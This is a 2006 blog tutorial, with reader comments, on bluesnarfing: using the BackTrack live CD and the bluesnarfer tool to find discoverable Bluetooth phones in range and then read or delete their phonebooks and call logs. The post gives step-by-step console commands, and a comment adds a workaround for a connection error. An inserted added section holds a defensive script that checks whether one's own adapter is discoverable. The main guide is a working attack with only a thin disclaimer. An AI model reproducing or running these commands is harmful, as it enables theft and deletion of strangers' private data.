Bluesnarfing

posted on July 11th, 2006


I don’t know if the following content is illegal or not, but I know that you can use it to do illegal things. I used the information only to find out how secure my $1000 cell phone (the Nokia 8800) is and not to harm anyone. If you think you want to harm someone with this information I urge you to leave this site now. Again: only use this guide for information purposes (e.g. finding out how safe your phone is, learning Linux).

There are many bluesnarf applications available and I’m still experimenting with them. Currently I find the method I’m going to describe now the easiest:

NOTE: All lines starting with “slax ~ #” are commands you need to type in a console. Don’t type “slax ~ #”, only the words after the #.

1. Download backtrack: http://www.remote-exploit.org/index.php/BackTrack.

2. Burn the live CD (the thing you’ve just downloaded), insert it in your computer and reboot. If everything goes well the CD should boot up. If Windows boots instead, go into your BIOS and change the first boot device to CD-ROM.

3. Log in (username = root; password = toor) and type ‘startx’ without quotes.

4. Open a console window by clicking the console icon in the bottom left corner of the screen.

Optional: if you want to set up a wireless internet connection, type in

slax ~ # iwconfig

Find your interface, mine is eth0, and fill in the name of your network, its channel and its key:

slax ~ # iwconfig <interface> essid <essid> channel <channel> key <key>

slax ~ # dhcpcd

5. Now plug in your bluetooth dongle if you haven’t already done so and in the console type in:

slax ~ # hciconfig

Now look at the name Linux gives your bluetooth device. In my case it’s hci0.

slax ~ # hciconfig hci0 up

6. The previous step enabled your device. In this step we are going to search for other devices that are in discoverable mode.

slax ~ # hcitool scan hci0

All discoverable devices in range will show up. The numbers are the bluetooth addresses. Mark one of the addresses, right-click and choose copy.

7. Now we are really going to bluesnarf using the program bluesnarfer.

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer [options] [ATCMD] -b bt_addr

You probably don’t know the options yet, so to make things easier here is the list of available options, as printed by the program itself:

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type
    example : “DC” (dialed call list)
              “SM” (SIM phonebook)
              “RC” (received call list)
              “XX” much more

-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel

-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search “name” in phonebook address
-s TYPE   : select phonebook memory storage
-l        : list available phonebook memory storage
-i        : device info

I think the best thing to do is to experiment with the options, but to get you started I made some examples (replace bt_addr with the address you copied in step 6):

View the phone’s phonebook:

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer -r A-Z -b bt_addr

View the last received calls:

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer -s RC -r 1-100 -b bt_addr

Delete the phonebook:

slax ~ # /pentest/bluetooth/bluesnarfer-0.1/bluesnarfer -w A-Z -b bt_addr

8. That’s all! You are now a professional bluesnarfer! If you get an error it’s possible that your phone is not vulnerable. I found out that this doesn’t work with the previously mentioned Nokia 8800, but I also tested it with an old 6310i and it worked without any problems! I’m currently searching for a better way, a way that works with all phones. Please check back later; if I find a better way I’ll post it on this blog. If you know a better way, please drop me an e-mail or leave a comment.
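Turning the guide around to the question it says it is for, how exposed your own phone and adapter are: the following is an added example, not part of the original post, that reads the output of the same two BlueZ commands used above (hciconfig and hcitool scan) and tells you whether your adapter is discoverable and whether a given phone address is visible to a scan. The samples are constructed to look like BlueZ-era output so the script runs offline; the hciconfig keywords noscan and pscan are real BlueZ options.

```shell
#!/bin/sh
# Added example, not part of the original post: audit your OWN Bluetooth
# exposure with the BlueZ tools the post uses. The samples below are
# constructed to look like hciconfig/hcitool output so the functions run
# offline; on a real box feed them "$(hciconfig hci0)" and "$(hcitool scan)".

SAMPLE_HCICONFIG=$(printf 'hci0:\tType: USB\n\tBD Address: 00:11:22:33:44:55 ACL MTU: 310:10 SCO MTU: 64:8\n\tUP RUNNING PSCAN ISCAN\n')
SAMPLE_SCAN=$(printf 'Scanning ...\n\t00:11:22:33:44:55\tMy Phone\n\tAA:BB:CC:DD:EE:FF\tLaptop\n')

# ISCAN (inquiry scan) means the adapter answers other people's "hcitool scan",
# i.e. it is discoverable. PSCAN (page scan) means it accepts connections.
adapter_discoverable() { printf '%s\n' "$1" | grep -qw 'ISCAN'; }
adapter_connectable()  { printf '%s\n' "$1" | grep -qw 'PSCAN'; }

# Turn "hcitool scan" output into "ADDR NAME" lines, skipping the header line.
scan_devices() {
    printf '%s\n' "$1" | awk -F'\t' 'NF >= 3 && length($2) == 17 && $2 ~ /^[0-9A-Fa-f:]+$/ { print $2, $3 }'
}

# Is the device with address $1 visible in the scan output $2?
device_visible() { scan_devices "$2" | grep -qi "^$1 "; }

# One-line verdict. "hciconfig hci0 noscan" disables both scans; "pscan"
# keeps the adapter reachable for already-paired devices but hidden from scans.
adapter_verdict() {
    if adapter_discoverable "$1"; then
        echo "discoverable: anyone in range can enumerate this adapter; run: hciconfig hci0 noscan (or pscan)"
    elif adapter_connectable "$1"; then
        echo "hidden but connectable"
    else
        echo "not scanning: neither discoverable nor connectable"
    fi
}

adapter_verdict "$SAMPLE_HCICONFIG"
scan_devices "$SAMPLE_SCAN"
```

A phone that does not appear in scan_devices output cannot be picked in step 6 at all; a phone that does appear is only safe if it refuses AT commands without pairing, which, as the comments below note, old models such as the 6310i do not.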

9 comments:

  1. d347hm4n said on March 1st, 2007 at 7:32 pm :

    bluesnarfer -r A-Z -b 00:16:20:34:72:CE
    device name: The Devils Reject
    bluesnarfer: open /dev/bluetooth/rfcomm/0, No such file or directory
    bluesnarfer: bt_rfcomm_config failed
    bluesnarfer: unable to create rfcomm connection
    bluesnarfer: release rfcomm ok

    I have seen this or similar messages all over the internet. Does this mean that the hax will not work? Is there a workaround? Thx

  2. anotheruser said on March 26th, 2007 at 3:15 pm :

    have you got anything more up to date ?

  3. iddqd said on April 10th, 2007 at 4:18 pm :

    I have the same problem with
    bluesnarfer: open /dev/bluetooth/rfcomm/0, No such file or directory
    help please

  4. Powers said on May 13th, 2007 at 3:13 pm :

    try the following:

    mkdir -p /dev/bluetooth/rfcomm
    mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0

    That should do it. Note: assuming a backtrack/auditor live CD boot, you will have to do this each time you boot, or put it into a startup script or something.

  5. G said on May 20th, 2007 at 11:09 am :

    Would I need to install a driver for the bluetooth dongle? If so, what dongle would you recommend I purchase, since having the wrong model = pain in the ass looking for drivers.

    Thanks

  6. G said on May 20th, 2007 at 11:27 am :

    Is this dongle fine: TrendNet TBW-101UB

  7. herm said on May 25th, 2007 at 6:31 pm :

    Help, I have the same issue!

  8. merde said on June 6th, 2007 at 8:38 pm :

    Too bad that the mentioned Nokia 6310i is one of the few phones that is indeed vulnerable (the Ericsson T68i too, if I recall correctly). Just about any phone newer than those won’t be tricked into allowing AT commands without proper authorization.

  9. felix said on September 24th, 2007 at 6:30 pm :

    This doesn’t work with the newest version of backtrack. I’m assuming that’s what it is.
